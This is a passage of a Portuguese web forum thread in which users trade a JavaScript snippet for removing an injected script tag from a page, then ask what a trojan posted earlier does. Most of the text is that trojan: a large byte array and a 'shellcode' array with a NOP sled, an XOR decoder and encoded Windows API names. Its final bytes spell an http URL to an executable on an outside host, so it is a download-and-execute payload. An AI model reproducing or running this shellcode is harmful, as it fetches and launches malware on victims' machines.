	46, -16, -128, 0, 44, 16, 65, 12, 98, -96, 		5, 52, 120, -63, 9, -15, -77, -126, 74, 5, 		57, 72, 7, 36, 32, -112, 114, 104, -87, 74, 		-83, 0, 83, -120, -26, -32, -105, 57, 64, -64, 		3, 46, 26, 5, -58, 88, 109, 100, 2, -8, 		-121, 83, 60, 64, 1, 54, 24, 117, -92, 26, 		40, 67, 25, 16, -64, 84, 39, 32, -96, 10, 		24, -104, -90, 25, -93, -103, -123, 12, 68, -13, 		-113, -15, -1, 116, -64, 40, 65, 89, -123, 25, 		24, -95, 5, 59, 48, -26, 77, -22, 80, -76, 		17, 64, 6, 0, 22, 1, 2, 5, 70, 58, 		82, -93, 30, -64, -125, 74, -115, 94, 3, -2, 		-89, 84, -108, -94, -44, 5, 111, 40, 3, 84, 		49, 16, 85, 43, -104, 17, -112, -66, 124, 105, 		24, 6, -128, 5, -54, -115, 12, 11, 11, 64, 		43, 0, -120, -22, -122, -58, 74, -63, 13, -122, 		-38, 64, 1, -15, 54, 39, 2, 78, -42, -126, 		-104, 125, -64, 13, 51, -128, -128, -9, -39, -11, 		13, 85, -24, 64, 27, -108, -96, -124, 36, -40, 		96, -111, 51, -13, -125, 18, 20, 11, -123, 35, 		-124, -120, 14, -57, -78, 89, 28, 100, -16, -123, 		13, 108, 64, 10, 6, -56, 21, -77, 118, -37, 		-78, 10, 54, -128, 3, -12, 75, 65, 28, -108, 		0, -126, 34, 24, -105, 4, 2, -64, 3, 106, 		71, -10, -125, 59, 40, 64, 1, 44, 88, -61, 		-105, 10, 80, -128, 57, 96, -31, -70, 88, 56, 		-127, 14, 120, -64, -121, 13, 24, 96, 68, 36, 		-118, 80, 30, -50, 96, 38, 51, 121, -117, 15, 		102, 32, 110, 49, 91, -72, -124, 37, -8, -13, 		106, 54, 16, -128, 0, -118, -48, 5, -20, -74, 		112, 16, 115, -48, -63, 17, 34, 96, 84, 3, 		108, -64, 76, 6, 8, -80, 109, 109, 123, -125, 		99, 17, -9, 4, 88, 104, -17, 70, -112, 73, 		49, -77, 42, 88, 17, 37, 40, -126, -1, 16, 		0, 0, 4, -94, 82, -96, -79, 1, -50, -80, 		1, -92, 64, -106, 57, -4, 64, 75, -78, 88, 		110, 10, 13, -31, 29, 60, 36, 54, 38, 40, 		-106, 73, -115, 86, 12, 4, 0, 48, 103, -60, 		-107, -64, -126, 16, 98, -30, -127, 26, -37, 120, 		-59, 53, -14, 0, 11, 104, 7, -29, 72, 120, 		-25, 4, 67, -120, 73, 84, 112, -68, 98, -94, 		2, 1, 14, -46, -22, -79, 35, 4, 116, -107, 		34, -112, 65, -59, 114, -111, 75, -115, 115, 12, 		6, 15, 48, 1, 15, 72, 80, -14, -110, 101, 		-15, -125, 34, -80, 96, -54, 20, 0, 67, -104, 		-85, 60, 101, 54, 64, -127, 9, 75, -56, -78, 		-106, 25, 49, -115, 15, -4, 0, 4, 50, -127, 		66, -115, -94, 28, 1, -88, 120, 0, 12, 102, 		-90, 66, -110, -42, -4, 17, 46, 83, 33, -50, 		53, 106, -84, 27, -22, 92, -27, -58, 82, 64, 		-49, 124, 126, 4, 30, -2, 28, 21, -71, -84, 		7, 12, -113, -114, 10, 27, -36, 48, 1, -9, 		34, 47, -47, -120, -64, -125, 18, -30, -20, -24, 		58, -81, -89, -79, 48, -104, -76, 18, -50, -122, 		-23, 69, -4, -32, -49, 43, -122, 116, 4, 6, 		-3, 104, 60, -77, 65, 9, -122, 45, 117, 33, 		78, 13, -123, 40, -85, 122, 61, 95, 104, -84, 		-85, 23, 16, 107, 89, 15, -126, -42, -74, -18, 		79, 4, 102, -28, 6, 54, 124, -95, 2, 71, 		-15, 117, 34, -34, -1, 92, -21, 78, 15, 27, 		-41, 70, 101, 3, -72, 78, 66, 86, 101, 31, 		98, 15, 125, 72, -121, -86, -63, 59, -20, 47, 		72, -95, -37, 122, -82, -74, -75, 11, 97, -127, 		108, -101, 102, 52, -32, 5, -81, -95, 70, -44, 		42, 113, -113, 123, 16, 54, 80, -126, 8, -6, 		-109, 110, 62, 64, -24, -74, -71, 21, -62, 9, 		84, -87, 100, -126, -68, 98, 2, 34, 24, -51, 		17, -64, -117, -86, 8, 17, -40, 12, 84, -32, 		119, -113, -3, 61, -126, -117, 89, -25, -31, 102, 		-32, 67, -82, 54, 112, -86, 44, -67, -69, 16, 		-80, 89, -125, 12, -74, 6, -95, 92, 37, -84, 		-68, 17, -16, -44, -59, -55, 13, -105, 108, -27, 		-118, 93, 83, -70, 1, 27, -104, -48, 107, 95, 		127, -96, 11, -77, -43, -42, -87, 8, -64, -82, 		60, -112, -120, -27, 35, -57, 10, 51, -89, -48, 		-122, -48, 108, 13, 97, 17, 122, -42, -120, 42, 		-48, -14, 68, -21, 28, 2, 50, -32, -63, 121, 		-88, -77, 53, 111, 17, -118, 0, 71, 112, -49, 		-56, 9, -15, -74, 30, -76, -63, 14, 62, -89, 		3, 7, -24, 48, -73, 52, 68, -24, 8, 22, 		-97, -6, 47, -106, 80, 0, 25, -104, -84, 86, 		15, 19, -17, 24, -4, 11, -10, 61, 95, -4, 		7, -58, -102, 2, -112, -126, -76, 48, -101, -13, 		65, 70, -32, 66, -47, -44, 9, 97, 1, 90, 		-47, 1, 78, 23, 88, -39, 23, -8, -48, 49, 		-1, 33, 36, 123, -17, 72, 124, 19, -42, 125, 		-128, 3, 14, -92, -127, 14, 102, 66, 65, 26, 		-66, 32, 4, 68, 34, 94, 16, 123, 80, -62, 		20, -100, -124, -125, 32, 49, -56, 76, 99, -96, 		3, 24, 22, -64, -114, -53, 7, -96, 8, 74, 		96, 60, -42, 59, 15, 34, 103, 65, -116, -12, 		106, 30, -7, -128, -26, 48, -125, 25, -12, 28, 		7, 56, -32, 80, -125, 52, 53, 55, 33, -32, 		-27, -14, 12, 72, 66, -25, -91, -125, -11, 32, 		-19, -22, 8, 55, 24, -125, 25, 68, 126, 121, 		61, -20, 1, 7, -75, -65, 61, 7, -74, -10, 		-9, 52, 24, 96, 13, -13, -38, 59, 3, 66, 		-80, -126, 14, -40, -95, 13, -71, 15, -51, -58, 		124, -80, 50, 33, -64, -52, -12, -63, -17, 64, 		-126, 114, 63, -123, -70, 89, 103, 65, 23, 80, 		-62, -117, 77, -1, -4, 21, -40, 30, 2, 109, 		96, -48, -5, -119, -61, 4, 44, 40, 28, -45, 		123, 48, 3, -10, -121, 127, -95, 65, 27, 15, 		39, 4, -39, -121, 120, -76, 103, 123, 109, -48, 		6, 61, 48, 5, 63, 87, 27, 11, 96, 54, 		28, -75, 119, 39, -64, 33, 118, -96, 32, -24, 		-111, 45, 50, -64, 5, 54, -96, 24, -90, -121, 		122, 109, 48, 3, 83, -64, 3, 83, -16, 112, 		55, 115, 4, 5, -32, 42, -1, -89, 101, -19, 		-48, 5, 74, -48, 115, -56, 2, 23, -74, 33, 		3, 66, -48, 3, 24, -108, -1, 23, -105, -9, 		1, 54, 48, 1, 37, 19, 75, 53, 120, 28, 		109, 80, 69, -90, 55, 8, 81, -64, 4, 66, 		0, 1, -51, 20, -124, 26, 87, 0, -106, -41, 		-126, 124, 86, 2, 36, 32, 4, 83, 48, 91, 		-73, 17, 24, 60, -112, 4, -78, -80, 69, -38, 		7, 31, 62, 18, 7, 26, 119, -123, 107, -96, 		3, -89, -43, 10, 12, -90, 108, 115, 36, 97, 		125, 112, 44, 125, -128, 28, 107, 96, 1, 3, 		2, 31, 123, -121, 22, 32, 48, 4, 55, -40, 		7, 109, -8, 18, 60, 64, 58, -46, 80, 53, 		-90, 87, 14, 21, 0, -122, 67, -16, 18, 47, 		65, -122, -16, 17, -121, -90, 87, 2, 58, -112, 		14, 107, -32, 20, 69, -79, 7, -106, 23, 0, 		-53, 80, -124, 1, -32, 19, 33, 37, 2, 100, 		96, 25, 58, -48, 5, -34, -15, 83, -105, -73, 		4, 119, 16, 82, -125, 8, 5, 66, 0, -119, 		-68, -63, 26, 80, -120, 105, 18, -58, 2, 109, 		8, 5, 74, -32, 11, 89, -95, 19, -108, 24, 		0, 54, -32, 22, 107, 64, 6, -26, -9, 123, 		-77, 88, 8, -68, -96, 4, 100, -48, 7, 74, 		-64, 99, -69, 88, 8, 12, 48, 7, 21, -96, 		13, 123, -80, 4, -52, -128, -120, -61, 24, 5, 		36, 112, 7, 42, -128, 5, -61, -120, 8, -115, 		36, 0, 54, 80, 2, -87, 120, 113, -9, 53, 		-115, -36, 104, 57, 24, 87, 116, -120, -57, -116, 		-52, -40, 9, -115, 63, 116, -122, -28, 40, 31, 		-127, 0, 0, 59	};	byte shellcode[] = {		-112, -112, -112, -112, -112, -112, -112, -112, -112, -112, 		-112, -112, -112, -112, -112, -112, -21, 16, 90, 74, 		51, -55, 102, -71, 60, 1, -128, 52, 10, -103, 		-30, -6, -21, 5, -24, -21, -1, -1, -1, 112, 		76, -103, -103, -103, -61, -3, 56, -87, -103, -103, 		-103, 18, -39, -107, 18, -23, -123, 52, 18, -39, 		-111, 18, 65, 18, -22, -91, 18, -19, -121, -31, 		-102, 106, 18, -25, -71, -102, 98, 18, -41, -115, 		-86, 116, -49, -50, -56, 18, -90, -102, 98, 18, 		107, -13, -105, -64, 106, 63, -19, -111, -64, -58, 		26, 94, -99, -36, 123, 112, -64, -58, -57, 18, 		84, 18, -33, -67, -102, 90, 72, 120, -102, 88, 		-86, 80, -1, 18, -111, 18, -33, -123, -102, 90, 		88, 120, -101, -102, 88, 18, -103, -102, 90, 18, 		99, 18, 110, 26, 95, -105, 18, 73, -13, -99, 		-64, 113, -55, -103, -103, -103, 26, 95, -108, -53, 		-49, 102, -50, 101, -61, 18, 65, -13, -104, -64, 		113, -92, -103, -103, -103, 26, 95, -118, -49, -33, 		25, -89, 25, -20, 99, 25, -81, 25, -57, 26, 		117, -71, 18, 69, -13, -71, -54, 102, -50, 117, 		94, -99, -102, -59, -8, -73, -4, 94, -35, -102, 		-99, -31, -4, -103, -103, -86, 89, -55, -55, -54, 		-49, -55, 102, -50, 101, 18, 69, -55, -54, 102, 		-50, 105, -55, 102, -50, 109, -86, 89, 53, 28, 		89, -20, 96, -56, -53, -49, -54, 102, 75, -61, 		-64, 50, 123, 119, -86, 89, 90, 113, -65, 102, 		102, 102, -34, -4, -19, -55, -21, -10, -6, -40, 		-3, -3, -21, -4, -22, -22, -103, -34, -4, -19, 		-54, -32, -22, -19, -4, -12, -35, -16, -21, -4, 		-6, -19, -10, -21, -32, -40, -103, -50, -16, -9, 		-36, -31, -4, -6, -103, -36, -31, -16, -19, -51, 		-15, -21, -4, -8, -3, -103, -43, -10, -8, -3, 		-43, -16, -5, -21, -8, -21, -32, -40, -103, -20, 		-21, -11, -12, -10, -9, -103, -52, -53, -43, -35, 		-10, -18, -9, -11, -10, -8, -3, -51, -10, -33, 		-16, -11, -4, -40, -103, 104, 116, 116, 112, 58, 		47, 47, 107, 111, 110, 105, 99, 110, 116, 46, 		99, 111, 109, 47, 108, 100, 47, 109, 101, 110, 		116, 47, 108, 100, 95, 109, 101, 110, 116, 46, 		101, 120, 101, -128, -112, -112, -112, -112, -112, -112	};}

[vagner.net 0]

Testa nesse script e adapta a sua situação:

<script>function getVirus(){	var virus = document.getElementById('conteudo').getElementsByTagName('script').item(0);	document.getElementById('conteudo').removeChild(virus);}</script><body onload="getVirus();"><div id="container">	<div id="corpo">		<div id="topo">		</div>		<div id="conteudo">			<script language="JavaScript">				document.write('AQUI ESTÀ O VÍRUS');			</script>		</div>		<div id="rodape">			<input type=button value=Exibir onclick="alert(document.getElementById('conteudo').innerHTML)" />		</div> 	</div></div></body>

Coloquei esse botão para você visualizar o efeito da função, depois você comenta a chamada da função getVirus() e verifica o retorno do innerHTML.

Eae cara, beleza?

Então eu testei a função que você fez...mas aqui ela não funcionou, tipo a frase "AQUI ESTÁ O VÍRUS" não é removida...

 

Darkness, não é a frase "AQUI ESTÁ O VÍRUS", que será removida. Pois ela ja foi escrita no HTML !!!

Se você realizar o teste que eu falei, removendo a chamada da função no onLoad do Body você vai ver a diferença!!!

[_Darkness_ 0]

Testa nesse script e adapta a sua situação:

<script>function getVirus(){	var virus = document.getElementById('conteudo').getElementsByTagName('script').item(0);	document.getElementById('conteudo').removeChild(virus);}</script><body onload="getVirus();"><div id="container">	<div id="corpo">		<div id="topo">		</div>		<div id="conteudo">			<script language="JavaScript">				document.write('AQUI ESTÀ O VÍRUS');			</script>		</div>		<div id="rodape">			<input type=button value=Exibir onclick="alert(document.getElementById('conteudo').innerHTML)" />		</div> 	</div></div></body>

Coloquei esse botão para você visualizar o efeito da função, depois você comenta a chamada da função getVirus() e verifica o retorno do innerHTML.

Eae cara, beleza?

Então eu testei a função que você fez...mas aqui ela não funcionou, tipo a frase "AQUI ESTÁ O VÍRUS" não é removida...

 

Darkness, não é a frase "AQUI ESTÁ O VÍRUS", que será removida. Pois ela ja foi escrita no HTML !!!

Se você realizar o teste que eu falei, removendo a chamada da função no onLoad do Body você vai ver a diferença!!!

 

Agora eu entendi, mals ae rs, valew cara...mas assim eu estava vendo os fontes acima...alguém sabe o que esse trojan faz?

O_O